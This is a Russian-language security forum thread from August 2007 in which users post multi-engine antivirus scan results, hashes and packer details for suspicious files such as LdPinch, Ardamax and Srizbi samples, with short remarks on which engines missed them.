Norman	5.80.02	2007.08.16	W32/Horst.gen29
Panda	9.0.0.4	2007.08.17	Generic Malware
Prevx1	V2	2007.08.17	Generic.Malware
Rising	19.36.42.00	2007.08.17	-
Sophos	4.20.0	2007.08.12	Mal/Packer
Sunbelt	2.2.907.0	2007.08.17	Backdoor.Nibu
Symantec	10	2007.08.17	Backdoor.Nibu
TheHacker	6.1.8.170	2007.08.17	-
VBA32	3.12.2.2	2007.08.16	suspected of Embedded.Trojan.NtRootKit.331
VirusBuster	4.3.26:9	2007.08.16	-
Webwasher-Gateway	6.0.1	2007.08.17	Trojan.Crypt.ULPM.Gen
Additional information
File size: 35605 bytes
MD5: 9e4295ea204dc617d79e81fc70a2e720
SHA1: 7b24eda6f71235fc1895416c297eb18bce2f8ec7
```



```
File reveal32.sys received on 08.17.2007 12:55:44 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.15.0	2007.08.17	-
AntiVir	7.4.1.62	2007.08.17	-
Authentium	4.93.8	2007.08.17	-
Avast	4.7.1029.0	2007.08.16	-
AVG	7.5.0.476	2007.08.16	-
BitDefender	7.2	2007.08.17	-
CAT-QuickHeal	9.00	2007.08.16	-
ClamAV	0.91	2007.08.16	-
DrWeb	4.33	2007.08.17	Trojan.NtRootKit.331
eSafe	7.0.15.0	2007.08.16	-
eTrust-Vet	31.1.5067	2007.08.17	-
Ewido	4.0	2007.08.17	-
FileAdvisor	1	2007.08.17	-
Fortinet	2.91.0.0	2007.08.16	-
F-Prot	4.3.2.48	2007.08.16	-
F-Secure	6.70.13030.0	2007.08.17	-
Ikarus	T3.1.1.12	2007.08.17	-
Kaspersky	4.0.2.24	2007.08.17	-
McAfee	5099	2007.08.16	-
Microsoft	1.2803	2007.08.17	-
NOD32v2	2467	2007.08.16	-
Norman	5.80.02	2007.08.16	-
Panda	9.0.0.4	2007.08.17	-
Rising	19.36.42.00	2007.08.17	-
Sophos	4.20.0	2007.08.12	-
Sunbelt	2.2.907.0	2007.08.17	-
Symantec	10	2007.08.17	-
TheHacker	6.1.8.170	2007.08.17	-
VBA32	3.12.2.2	2007.08.16	Trojan.NtRootKit.331
VirusBuster	4.3.26:9	2007.08.16	-
Webwasher-Gateway	6.0.1	2007.08.17	-
Additional information
File size: 14848 bytes
MD5: e79b7e3aada4461c8a94812fc2036e88
SHA1: ad9230b49d376a9e5ac4dbf3c7a6065d480fd203
```

----------


## Синауридзе Александр

File msdnc0.exe received on 08.19.2007 06:22:18 (CET)

Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.8.18.0	2007.08.18	-
*AntiVir	7.4.1.62	2007.08.19	TR/Crypt.XPACK.Gen*
Authentium	4.93.8	2007.08.17	-
Avast	4.7.1029.0	2007.08.17	-
*AVG	7.5.0.484	2007.08.18	PSW.Ldpinch.NEK*
*BitDefender	7.2	2007.08.19	Trojan.PWS.LDPinch.TAW*
*CAT-QuickHeal	9.00	2007.08.18	TrojanPSW.LdPinch.bno*
ClamAV	0.91	2007.08.19	-
*DrWeb	4.33	2007.08.18	Trojan.PWS.LDPinch.1781*
*eSafe	7.0.15.0	2007.08.16	Win32.LdPinch.bno*
*eTrust-Vet	31.1.5069	2007.08.18	Win32/LdPinch.CM*
*Ewido	4.0	2007.08.18	Trojan.LdPinch.bno*
FileAdvisor	1	2007.08.19	-
*Fortinet	2.91.0.0	2007.08.18	W32/Basine.BNO!tr.pws*
F-Prot	4.3.2.48	2007.08.17	-
*F-Secure	6.70.13030.0	2007.08.17	Trojan-PSW.Win32.LdPinch.bno*
*Ikarus	T3.1.1.12	2007.08.18	Trojan-PWS.Win32.LdPinch.bno*
*Kaspersky	4.0.2.24	2007.08.19	Trojan-PSW.Win32.LdPinch.bno*
McAfee	5100	2007.08.17	-
*Microsoft	1.2803	2007.08.19	TrojanDownloader:Win32/Small.CBA*
NOD32v2	2469	2007.08.18	-
*Norman	5.80.02	2007.08.17	LdPinch.JVR*
*Panda	9.0.0.4	2007.08.18	Generic Trojan*
*Prevx1	V2	2007.08.19	Generic.Malware*
*Rising	19.36.60.00	2007.08.19	Packer.RyCrypt*
*Sophos	4.20.0	2007.08.12	Mal/Basine-C*
*Sunbelt	2.2.907.0	2007.08.18	Trojan-PSW.Win32.LdPinch.bno*
*Symantec	10	2007.08.19	Infostealer.Ldpinch*
*TheHacker	6.1.8.170	2007.08.17	Trojan/PSW.LdPinch.bno*
VBA32	3.12.2.2	2007.08.17	-
*VirusBuster	4.3.26:9	2007.08.18	Trojan.DR.Cimuz.Gen.1*
*Webwasher-Gateway	6.0.1	2007.08.19	Trojan.Crypt.XPACK.Gen*

Additional information
File size: 58634 bytes
MD5: 58a71e7c9edefb1270c2292318a61ff6
SHA1: a3efc9514ea657dbcce516f06532af81b3b03091
packers: RCrypt
Prevx info: http://fileinfo.prevx.com/fileinfo.a...4F610014A92673

----------


## urbanangel

File D3DGear_v1.96_Keygen.exe received on 08.20.2007 22:18:12 (CET)
Current status: finished 
Result: 22/32 (68.75%) 

Antivirus Version Last Update Result 
*AhnLab-V3 2007.8.21.0 2007.08.20 Win-Trojan/Ardamax.320830* 
AntiVir 7.4.1.62 2007.08.20 - 
*Authentium 4.93.8 2007.08.20 W32/Trojan.ATHZ* 
*Avast 4.7.1029.0 2007.08.20 Win32:Ardamax-CJ* 
*AVG 7.5.0.484 2007.08.20 PSW.Generic4.TGX* 
*BitDefender 7.2 2007.08.20 Application.Ardamax.AK* 
*CAT-QuickHeal 9.00 2007.08.20 TrojanSpy.Ardamax.j* 
*ClamAV 0.91 2007.08.20 Trojan.Spy.Ardamax-25* 
DrWeb 4.33 2007.08.20 - 
*eSafe 7.0.15.0 2007.08.20 Win32.Ardamax.j* 
eTrust-Vet 31.1.5069 2007.08.18 - 
*Ewido 4.0 2007.08.20 Logger.Ardamax.i* 
FileAdvisor 1 2007.08.20 - 
*Fortinet 2.91.0.0 2007.08.20 Spy/Ardamax* 
*F-Prot 4.3.2.48 2007.08.20 W32/Trojan.ATHZ* 
*F-Secure 6.70.13030.0 2007.08.20 Trojan-Spy.Win32.Ardamax.j* 
*Ikarus T3.1.1.12 2007.08.20 Trojan-Spy.Win32.Ardamax.j* 
Kaspersky 4.0.2.24 2007.08.20 - 
*McAfee 5101 2007.08.20 Keylog-Ardamax.dr.gen* 
Microsoft 1.2803 2007.08.20 - 
*NOD32v2 2471 2007.08.20 probably a variant of Win32/Keylogger.Ardamax* 
*Norman 5.80.02 2007.08.20 W32/Ardamax.CLC* 
Panda 9.0.0.4 2007.08.19 - 
*Prevx1 V2 2007.08.20 Generic.Malware* 
*Rising 19.36.60.00 2007.08.19 Trojan.Spy.Win32.Ardamax.l* 
Sophos 4.20.0 2007.08.12 - 
Sunbelt 2.2.907.0 2007.08.18 - 
*Symantec 10 2007.08.20 Spyware.Ardakey* 
*TheHacker 6.1.8.171 2007.08.20 Trojan/Spy.Ardamax.j* 
*VBA32 3.12.2.2 2007.08.20 Trojan-Spy.Win32.Ardamax.j* 
VirusBuster 4.3.26:9 2007.08.20 - 
*Webwasher-Gateway 6.0.1 2007.08.20 Riskware.Ardamax.K.Gen* 
Additional information 
File size: 347562 bytes 
MD5: 9a471ee529efe82d02760d2dcb4888a8 
SHA1: 67504fd4656b7529c6c97058f3cd65ea5e5219f2 
packers: ZLIB 
Prevx info: http://fileinfo.prevx.com/fileinfo.a...E44700A873A9B3

----------


## Muzzle

топик  t=11836
файл *Dert69.sys* 



> AhnLab-V3	2007.8.21.0	2007.08.20	-
> AntiVir	7.4.1.62	2007.08.20	RKit/Agent.EA.40
> Authentium	4.93.8	2007.08.20	-
> Avast	4.7.1029.0	2007.08.20	Win32:Agent-FTK
> AVG	7.5.0.484	2007.08.20	BackDoor.Generic8.CJX
> BitDefender	7.2	2007.08.21	-
> CAT-QuickHeal	9.00	2007.08.20	Rootkit.Agent.ea
> ClamAV	0.91	2007.08.21	-
> DrWeb	4.33	2007.08.20	Trojan.Spambot.2400
> ...

----------


## Jolly Rojer

File firewall.exe received on 08.21.2007 03:32:41 (CET)
Current status:   finished 
Result: 13/32 (40.63%) 
 Compact 
Print results  Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.21.0	2007.08.20	-
*AntiVir	7.4.1.62	2007.08.20	BDS/Agent.YRG.12*
Authentium	4.93.8	2007.08.20	-
Avast	4.7.1029.0	2007.08.20	-
*AVG	7.5.0.484	2007.08.20	Worm/Agobot.FVW
BitDefender	7.2	2007.08.21	MemScan:Backdoor.Agent.YRG*
*CAT-QuickHeal	9.00	2007.08.20	(Suspicious) - DNAScan*
ClamAV	0.91	2007.08.21	-
DrWeb	4.33	2007.08.20	-
*eSafe	7.0.15.0	2007.08.20	suspicious Trojan/Worm*
eTrust-Vet	31.1.5069	2007.08.18	-
*Ewido	4.0	2007.08.20	Backdoor.PoeBot.o*
FileAdvisor	1	2007.08.21	-
Fortinet	2.91.0.0	2007.08.20	-
F-Prot	4.3.2.48	2007.08.20	-
F-Secure	6.70.13030.0	2007.08.21	-
*Ikarus	T3.1.1.12	2007.08.20	MemScanBackdoor.Agent.YRG*
Kaspersky	4.0.2.24	2007.08.21	-
McAfee	5101	2007.08.20	-
*Microsoft	1.2803	2007.08.21	Exploit:Win32/MS06040.gen
NOD32v2	2472	2007.08.21	a variant of Win32/Poebot*
Norman	5.80.02	2007.08.20	-
*Panda	9.0.0.4	2007.08.19	Suspicious file
Prevx1	V2	2007.08.21	Trojan.SystemPoser*
Rising	19.36.60.00	2007.08.19	-
Sophos	4.20.0	2007.08.12	-
*Sunbelt	2.2.907.0	2007.08.21	VIPRE.Suspicious*
Symantec	10	2007.08.21	-
TheHacker	6.1.8.171	2007.08.20	-
VBA32	3.12.2.2	2007.08.21	-
VirusBuster	4.3.26:9	2007.08.20	-
*Webwasher-Gateway	6.0.1	2007.08.21	Trojan.Agent.YRG.12*
Additional information
File size: 50142 bytes
MD5: 0fcde95916fcc23ecbed1b47632cd74c
SHA1: c2dd58be2f5ddfbf89c8ababf07009034bdfbfdd

----------


## santy

File file.exe received on 08.21.2007 10:15:10 (CET)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 18/31 (58.07%)

Antivirus Version Last Update Result
*AhnLab-V3 2007.8.21.2 2007.08.21 Win-Trojan/Downloader.10330*
*AntiVir 7.4.1.62 2007.08.21 TR/Dldr.Small.ezc*
*Authentium 4.93.8 2007.08.20 W32/Downloader.gen10*
Avast 4.7.1029.0 2007.08.20 -
*AVG 7.5.0.484 2007.08.20 Downloader.Generic5.QZX*
*BitDefender 7.2 2007.08.21 BehavesLike:Trojan.Downloader*
CAT-QuickHeal 9.00 2007.08.20 -
ClamAV 0.91 2007.08.21 -
*DrWeb 4.33 2007.08.20 Trojan.DownLoader.29701*
*eSafe 7.0.15.0 2007.08.20 Win32.Small.ezc*
eTrust-Vet 31.1.5076 2007.08.21 -
Ewido 4.0 2007.08.20 -
FileAdvisor 1 2007.08.21 -
*Fortinet 2.91.0.0 2007.08.21 W32/Small.EZC!tr.dldr*
*F-Prot 4.3.2.48 2007.08.20 W32/Downloader.gen10*
*F-Secure 6.70.13030.0 2007.08.21 Trojan-Downloader.Win32.Small.ezc*
*Ikarus T3.1.1.12 2007.08.21 Trojan-Downloader.Win32.Small.ezc*
Kaspersky 4.0.2.24 2007.08.21 -
McAfee 5101 2007.08.20 -
*Microsoft 1.2803 2007.08.21 TrojanDownloader:Win32/Small.gen!O*
*NOD32v2 2472 2007.08.21 probably unknown NewHeur_PE virus*
*Norman 5.80.02 2007.08.20 W32/DLoader.DBTS*
Panda 9.0.0.4 2007.08.21 -
Prevx1 V2 2007.08.21 -
Rising 19.37.12.00 2007.08.21 -
*Sophos 4.20.0 2007.08.21 Mal/TinyDL-L*
*Sunbelt 2.2.907.0 2007.08.21 Trojan-Downloader.Win32.Small.gen!O*
Symantec 10 2007.08.21 -
*TheHacker 6.1.8.171 2007.08.21 Trojan/Downloader.Small.ezc*
*VBA32 3.12.2.2 2007.08.21 Trojan-Downloader.Win32.Small.ezc*
VirusBuster 4.3.26:9 2007.08.20 -
Additional information
File size: 10332 bytes
MD5: 4f30c174ae755b88aad65eda62549800
SHA1: 5bd178a6a4fea918d77ad19391eb05548688a80d

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## XL

> File applet.exe received on 08.21.2007 19:24:11 (CET)
> Current status:    finished 
> Result: 16/32 (50%) 
>  Compact 
> Print results  Antivirus	Version	Last Update	Result
> AhnLab-V3	2007.8.22.0	2007.08.21	-
> *AntiVir	7.4.1.62	2007.08.21	WORM/Zhelatin.Gen
> Authentium	4.93.8	2007.08.20	Possibly a new variant of W32/Fathom.2-based!Maximus
> Avast	4.7.1029.0	2007.08.21	Win32helatin-ANZ
> ...


Каспер с Нодом подкачали...или не успели еще  :Smiley: 

****




> File Dumped.sys received on 08.21.2007 19:33:40 (CET)
> Current status:    finished 
> Result: 4/32 (12.5%) 
>  Compact 
> Print results  Antivirus	Version	Last Update	Result
> AhnLab-V3	2007.8.22.0	2007.08.21	-
> AntiVir	7.4.1.62	2007.08.21	-
> Authentium	4.93.8	2007.08.20	-
> *Avast	4.7.1029.0	2007.08.21	Win32:Agent-FTK
> ...


А это детект дампа, снятого через RKU с одного зверька сегодня. Бился с ним более получаса, в итоге небезуспешно. Очень похож на Trojan.Srizbi, скрипт для убиения которого обсуждается в закрытом разделе форума.

----------


## vaber

> Очень похож на Trojan.Srizbi, скрипт для убиения которого обсуждается в закрытом разделе форума.


А это он и есть  :Smiley:  Srizbi детектируется Касперским именно как Rootkit.Win32.Agent.ea.Ну а вердикт Ikarus = Kaspersky

----------


## Winsent

File 1.exe received on 08.24.2007 05:41:04 (CET)
Current status:    finished 
Result: 12/32 (37.5%)


Antivirus	Version	Last Update	Result.

AhnLab-V3	2007.8.22.0	2007.08.24	-
*AntiVir	7.4.1.63	2007.08.23	DR/Delphi.Gen*
Authentium	4.93.8	2007.08.23	-
*Avast	4.7.1029.0	2007.08.24	Win32dPinch-NO*
AVG	7.5.0.484	2007.08.23	-
*BitDefender	7.2	2007.08.24	MemScan:Trojan.PWS.LdPinch.BSG*
CAT-QuickHeal	9.00	2007.08.23	-
*ClamAV	0.91	2007.08.24	Trojan.Dropper.Delf-65
DrWeb	4.33	2007.08.23	Trojan.PWS.LDPinch.1467
eSafe	7.0.15.0	2007.08.23	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5083	2007.08.24	-
Ewido	4.0	2007.08.23	-
FileAdvisor	1	2007.08.24	-
Fortinet	2.91.0.0	2007.08.24	-
F-Prot	4.3.2.48	2007.08.23	-
F-Secure	6.70.13030.0	2007.08.24	-
Ikarus	T3.1.1.12	2007.08.24	-
*Kaspersky	4.0.2.24	2007.08.24	Trojan-Dropper.Win32.Agent.bqb
McAfee	5104	2007.08.23	W32/Generic.Delphi.b*
Microsoft	1.2803	2007.08.24	-
*NOD32v2	2481	2007.08.24	a variant of Win32/PSW.LdPinch.NCB*
Norman	5.80.02	2007.08.23	-
*Panda	9.0.0.4	2007.08.24	Suspicious file*
Prevx1	V2	2007.08.24	-
Rising	19.37.40.00	2007.08.24	-
Sophos	4.20.0	2007.08.24	-
Sunbelt	2.2.907.0	2007.08.24	-
Symantec	10	2007.08.24	-
TheHacker	6.1.8.172	2007.08.24	-
*VBA32	3.12.2.3	2007.08.23	MalwareScope.Trojan-PSW.Pinch.1*
VirusBuster	4.3.26:9	2007.08.23	-
*Webwasher-Gateway	6.0.1	2007.08.24	Trojan.Delphi.Gen*

Additional information
File size: 78160 bytes
MD5: df12100205b0d79efb9129c8a34a75cd
SHA1: 9022ae857bc001aa2b1a008b87bb2c52b9c33167
packers: PECompact
packers: BINARYRES, PECOMPACT
packers: PecBundle, PECompact

----------


## Winsent

File sobchak.scr received on 08.27.2007 19:50:49 (CET)
Current status:    finished 
Result: 15/32 (46.88%) 


Antivirus	Version	Last Update	Result

AhnLab-V3	2007.8.28.0	2007.08.27	-
*AntiVir	7.4.1.63	2007.08.27	TR/Crypt.XPACK.Gen*
Authentium	4.93.8	2007.08.26	-
Avast	4.7.1029.0	2007.08.27	-
*AVG	7.5.0.484	2007.08.27	Win32/PolyCrypt
BitDefender	7.2	2007.08.27	Trojan.PWS.LDPinch.TAW*
CAT-QuickHeal	9.00	2007.08.25	-
ClamAV	0.91	2007.08.27	-
DrWeb	4.33	2007.08.27	-
*eSafe	7.0.15.0	2007.08.26	Suspicious Trojan/Worm*
eTrust-Vet	31.1.5088	2007.08.27	-
Ewido	4.0	2007.08.27	-
FileAdvisor	1	2007.08.27	-
Fortinet	2.91.0.0	2007.08.27	-
F-Prot	4.3.2.48	2007.08.26	-
*F-Secure	6.70.13260.0	2007.08.27	Trojan-PSW.Win32.LdPinch.ckf
Ikarus	T3.1.1.12	2007.08.27	Trojan-PWS.Win32.Lmir.AGP
Kaspersky	4.0.2.24	2007.08.27	Packed.Win32.PolyCrypt.d
McAfee	5106	2007.08.27	New Malware.ek
Microsoft	1.2803	2007.08.27	TrojanDownloader:Win32/Small.CBA*
NOD32v2	2486	2007.08.27	-
*Norman	5.80.02	2007.08.27	Suspicious_P.gen*
Panda	9.0.0.4	2007.08.27	-
Prevx1	V2	2007.08.27	-
*Rising	19.38.02.00	2007.08.27	Packer.RyCrypt
Sophos	4.21.0	2007.08.27	Mal/AvPak
Sunbelt	2.2.907.0	2007.08.25	VIPRE.Suspicious*
Symantec	10	2007.08.27	-
TheHacker	6.1.9.173	2007.08.27	-
VBA32	3.12.2.3	2007.08.27	-
*VirusBuster	4.3.26:9	2007.08.27	Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway	6.0.1	2007.08.27	Trojan.Crypt.XPACK.Gen*

Additional information
File size: 66755 bytes
MD5: ef2e89c62eedfa555665d344d3cf8abe
SHA1: a051df1f7eeb005bb568be9c0948a90b76e4b53f
packers: RCrypt
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## Shu_b

t-11969

File avz00002.dta received on 08.28.2007 13:21:31 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.28.2	2007.08.28	-
*AntiVir	7.4.1.63	2007.08.28	TR/Agent.GBC*
Authentium	4.93.8	2007.08.28	-
Avast	4.7.1029.0	2007.08.27	-
*AVG	7.5.0.484	2007.08.27	SHeur.DLP
BitDefender	7.2	2007.08.28	BehavesLike:Trojan.StartPage
CAT-QuickHeal	9.00	2007.08.25	(Suspicious) - DNAScan
*ClamAV	0.91	2007.08.28	-
*DrWeb	4.33	2007.08.28	modification of Trojan.Packed.162
eSafe	7.0.15.0	2007.08.26	-1646264482
*eTrust-Vet	31.1.5091	2007.08.28	-
Ewido	4.0	2007.08.27	-
FileAdvisor	1	2007.08.28	-
Fortinet	2.91.0.0	2007.08.28	-
F-Prot	4.3.2.48	2007.08.28	-
F-Secure	6.70.13030.0	2007.08.28	-
*Ikarus	T3.1.1.12	2007.08.28	BehavesLikeTrojan.StartPage
*Kaspersky	4.0.2.24	2007.08.28	-
McAfee	5106	2007.08.27	-
Microsoft	1.2803	2007.08.28	-
NOD32v2	2488	2007.08.28	-
Norman	5.80.02	2007.08.28	-
*Panda	9.0.0.4	2007.08.28	Trj/Agent.GBC
Prevx1	V2	2007.08.28	Trojan.SystemPoser
Rising	19.38.12.00	2007.08.28	Trojan.Win32.Agent.gbc
*Sophos	4.21.0	2007.08.28	-
*Sunbelt	2.2.907.0	2007.08.25	VIPRE.Suspicious
*Symantec	10	2007.08.28	-
TheHacker	6.1.9.175	2007.08.28	-
VBA32	3.12.2.3	2007.08.28	-
VirusBuster	4.3.26:9	2007.08.27	-
*Webwasher-Gateway	6.0.1	2007.08.28	Trojan.Agent.GBC
*Additional information
File size: 45743 bytes
MD5: 7ed38b35477c4be7ea4aae15478b6ef7
SHA1: 30ac390cd908a4773f47205d621afe0d0a502f04

*Добавлено через 28 минут*

File http__www.****.com_youtube__w received on 08.28.2007 14:01:03 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.28.2	2007.08.28	-
*AntiVir	7.4.1.63	2007.08.28	HEUR/Malware*
Authentium	4.93.8	2007.08.28	-
Avast	4.7.1029.0	2007.08.27	-
*AVG	7.5.0.484	2007.08.27	Generic6.ULJ
BitDefender	7.2	2007.08.28	Dropped:Generic.Malware.Yddld!!.ACDA918A*
CAT-QuickHeal	9.00	2007.08.25	-
*ClamAV	0.91	2007.08.28	Trojan.Dropper-2269*
DrWeb	4.33	2007.08.28	-
*eSafe	7.0.15.0	2007.08.26	suspicious Trojan/Worm*
eTrust-Vet	31.1.5091	2007.08.28	-
Ewido	4.0	2007.08.27	-
FileAdvisor	1	2007.08.28	-
*Fortinet	2.91.0.0	2007.08.28	W32/Agent.AVM!tr*
F-Prot	4.3.2.48	2007.08.28	-
*F-Secure	6.70.13030.0	2007.08.28	Trojan.Win32.Agent.avm
Ikarus	T3.1.1.12	2007.08.28	Win32.SuspectCrc
Kaspersky	4.0.2.24	2007.08.28	Trojan.Win32.Agent.avm*
McAfee	5106	2007.08.27	-
Microsoft	1.2803	2007.08.28	-
NOD32v2	2488	2007.08.28	-
*Norman	5.80.02	2007.08.28	W32/Malware
Panda	9.0.0.4	2007.08.28	Trj/Downloader.MDW*
Prevx1	V2	2007.08.28	-
Rising	19.38.12.00	2007.08.28	-
*Sophos	4.21.0	2007.08.28	Mal/Generic-A*
Sunbelt	2.2.907.0	2007.08.25	-
Symantec	10	2007.08.28	-
*TheHacker	6.1.9.175	2007.08.28	Trojan/Agent.avm
VBA32	3.12.2.3	2007.08.28	Trojan.Win32.Agent.avm*
VirusBuster	4.3.26:9	2007.08.27	-
*Webwasher-Gateway	6.0.1	2007.08.28	Heuristic.Malware*
Additional information
File size: 113152 bytes
MD5: a2880ae984568cf6708500f7d719ddf5
SHA1: 9b0e5f41dc7ea8f74c209d99f5b4a83a5ada06c4
packers: UPX
packers: UPX, BINARYRES, UPX, BINARYRES

----------


## RobinFood

Похоже, у меня эпидемия  :Smiley: 

File ulsoxoi.exe received on 08.28.2007 13:51:20 (CET)
Antivirus Version Last Update Result 
*AhnLab-V3 2007.8.28.2 2007.08.28 Win32/IRCBot.worm.504480*
*AntiVir 7.4.1.63 2007.08.28 HEUR/Crypted*
Authentium 4.93.8 2007.08.28 - 
Avast 4.7.1029.0 2007.08.27 - 
*AVG 7.5.0.484 2007.08.27 SHeur.JOR*
*BitDefender 7.2 2007.08.28 DeepScan:Generic.Sdbot.F47A0C90*
*CAT-QuickHeal 9.00 2007.08.25 Backdoor.SdBot.gen*
ClamAV 0.91 2007.08.28 - 
DrWeb 4.33 2007.08.28 - 
eSafe 7.0.15.0 2007.08.26 - 
eTrust-Vet 31.1.5091 2007.08.28 - 
Ewido 4.0 2007.08.27 - 
FileAdvisor 1 2007.08.28 - 
Fortinet 2.91.0.0 2007.08.28 - 
F-Prot 4.3.2.48 2007.08.28 - 
F-Secure 6.70.13030.0 2007.08.28 - 
*Ikarus T3.1.1.12 2007.08.28 Generic.Sdbot*
Kaspersky 4.0.2.24 2007.08.28 - 
*McAfee 5106 2007.08.27 New Malware.gp*
Microsoft 1.2803 2007.08.28 - 
NOD32v2 2488 2007.08.28 - 
Norman 5.80.02 2007.08.28 - 
Panda 9.0.0.4 2007.08.28 - 
*Prevx1 V2 2007.08.28 Worm.Rbot*
Rising 19.38.12.00 2007.08.28 - 
Sophos 4.21.0 2007.08.28 - 
*Sunbelt 2.2.907.0 2007.08.25 VIPRE.Suspicious*
Symantec 10 2007.08.28 - 
TheHacker 6.1.9.175 2007.08.28 - 
VBA32 3.12.2.3 2007.08.28 - 
VirusBuster 4.3.26:9 2007.08.27 - 
*Webwasher-Gateway 6.0.1 2007.08.28 Heuristic.Crypted*
Additional information 
File size: 504480 bytes 
MD5: e36c441a19c72d71eea9e27a3f86c292 
SHA1: 679aabd092915d0e788b2b1b092e36b7a11424f5 
packers: Themida 
Prevx info: http://fileinfo.prevx.com/fileinfo.a...0E5300F089BAE4 
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## Shu_b

t=11980
File avz00001.dta received on 08.28.2007 20:47:31 (CET)Antivirus	Version	Last Update	Result
AhnLab-V3	2007.8.29.0	2007.08.28	-
*AntiVir	7.4.1.63	2007.08.28	HEUR/Crypted*
Authentium	4.93.8	2007.08.28	-
Avast	4.7.1029.0	2007.08.28	-
AVG	7.5.0.484	2007.08.28	-
BitDefender	7.2	2007.08.28	-
CAT-QuickHeal	9.00	2007.08.25	-
ClamAV	0.91.2	2007.08.28	-
DrWeb	4.33	2007.08.28	-
*eSafe	7.0.15.0	2007.08.28	suspicious Trojan/Worm*
eTrust-Vet	31.1.5091	2007.08.28	-
Ewido	4.0	2007.08.28	-
FileAdvisor	1	2007.08.28	-
Fortinet	2.91.0.0	2007.08.28	-
F-Prot	4.3.2.48	2007.08.28	-
F-Secure	6.70.13030.0	2007.08.28	-
Ikarus	T3.1.1.12	2007.08.28	-
Kaspersky	4.0.2.24	2007.08.28	-
McAfee	5107	2007.08.28	-
*Microsoft	1.2803	2007.08.28	TrojanDownloader:Win32/Renos*
NOD32v2	2489	2007.08.28	-
Norman	5.80.02	2007.08.28	-
Panda	9.0.0.4	2007.08.28	-
*Prevx1	V2	2007.08.28	Spyware.WinAntiVirus*
Rising	19.38.12.00	2007.08.28	-
*Sophos	4.21.0	2007.08.28	Mal/EncPk-AV
Sunbelt	2.2.907.0	2007.08.25	VIPRE.Suspicious*
Symantec	10	2007.08.28	-
TheHacker	6.1.9.175	2007.08.28	-
VBA32	3.12.2.3	2007.08.28	-
VirusBuster	4.3.26:9	2007.08.28	-
*Webwasher-Gateway	6.0.1	2007.08.28	Heuristic.Crypted*

Additional information
File size: 16896 bytes
MD5: c4fd4f9445461a705798ee6a9b649caa
SHA1: 9fdcbec52d049ff502aba952cd6cf1b0ad79fde4

----------


## drongo

T=12012


```
 File avz00004.dta received on 08.30.2007 10:58:15 (CET)

	
Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.8.29.0	2007.08.30	-
AntiVir	7.4.1.66	2007.08.30	TR/Dldr.ConHook.Gen
Authentium	4.93.8	2007.08.29	-
Avast	4.7.1029.0	2007.08.29	-
AVG	7.5.0.484	2007.08.29	BHO.AMJ
BitDefender	7.2	2007.08.30	MemScan:Trojan.Juan.V
CAT-QuickHeal	9.00	2007.08.30	-
ClamAV	0.91.2	2007.08.29	-
DrWeb	4.33	2007.08.30	Trojan.Virtumod
eSafe	7.0.15.0	2007.08.29	suspicious Trojan/Worm
eTrust-Vet	31.1.5095	2007.08.30	-
Ewido	4.0	2007.08.29	-
FileAdvisor	1	2007.08.30	-
Fortinet	3.11.0.0	2007.08.30	-
F-Prot	4.3.2.48	2007.08.29	-
F-Secure	6.70.13030.0	2007.08.30	-
Ikarus	T3.1.1.12	2007.08.30	MemScanTrojan.Juan.V
Kaspersky	4.0.2.24	2007.08.30	-
McAfee	5108	2007.08.29	-
Microsoft	1.2803	2007.08.30	-
NOD32v2	2491	2007.08.30	a variant of Win32/BHO.G
Norman	5.80.02	2007.08.29	Suspicious_R.gen
Panda	9.0.0.4	2007.08.29	Suspicious file
Prevx1	V2	2007.08.30	Generic.Malware
Rising	19.38.31.00	2007.08.30	-
Sophos	4.21.0	2007.08.30	-
Sunbelt	2.2.907.0	2007.08.25	Virtumonde
Symantec	10	2007.08.30	-
TheHacker	6.1.9.175	2007.08.30	-
VBA32	3.12.2.3	2007.08.28	Trojan.Virtumod
VirusBuster	4.3.26:9	2007.08.29	-
Webwasher-Gateway	6.0.1	2007.08.30	Trojan.Dldr.ConHook.Gen
Additional information
File size: 63598 bytes
MD5: 37ebe8949ae4f403aa037b184636d2c4
SHA1: d370ece1f3892d5b426e36cad93fd4b101f5dbc6
packers: RLPack
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PX5=ECD659906E6212C0F82E00C91BAEAC00B5ED8FAC
Sunbelt info: Virtumonde is an adware program that displays pop-up advertisements on the desktop. Virtumonde also downloads other software from various remote servers.
```

----------


## santy

File Trojan.DownLoader.Nurech.BV.rar received on 08.31.2007 12:06:45 (CET)

Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.9.1.0	2007.08.31	-
AntiVir	7.4.1.66	2007.08.31	-
Authentium	4.93.8	2007.08.31	-
Avast	4.7.1029.0	2007.08.30	-
*AVG	7.5.0.484	2007.08.31	Downloader.Generic5.TWO*
BitDefender	7.2	2007.08.31	-
CAT-QuickHeal	9.00	2007.08.30	-
*ClamAV	0.91.2	2007.08.31	Trojan.Downloader-12895*
*DrWeb	4.33	2007.08.31	Trojan.DownLoader.30458*
eSafe	7.0.15.0	2007.08.29	-
eTrust-Vet	31.1.5099	2007.08.31	-
Ewido	4.0	2007.08.30	-
FileAdvisor	1	2007.08.31	-
Fortinet	3.11.0.0	2007.08.31	-
*F-Prot	4.3.2.48	2007.08.31	W32/Trojan.BVZH*
F-Secure	6.70.13030.0	2007.08.31	-
*Ikarus	T3.1.1.12	2007.08.31	Trojan-Downloader.Win32.Small.evh*
Kaspersky	4.0.2.24	2007.08.31	-
*McAfee	5109	2007.08.30	Downloader-AAP.gen*
*Microsoft	1.2803	2007.08.31	TrojanDownloader:Win32/Agent.ABZ*
*NOD32v2	2493	2007.08.31	a variant of Win32/TrojanDownloader.Nurech.BV*
Norman	5.80.02	2007.08.30	-
Panda	9.0.0.4	2007.08.31	-
Prevx1	V2	2007.08.31	-
Rising	19.38.42.00	2007.08.31	-
*Sophos	4.21.0	2007.08.31	Mal/Clagger-G*
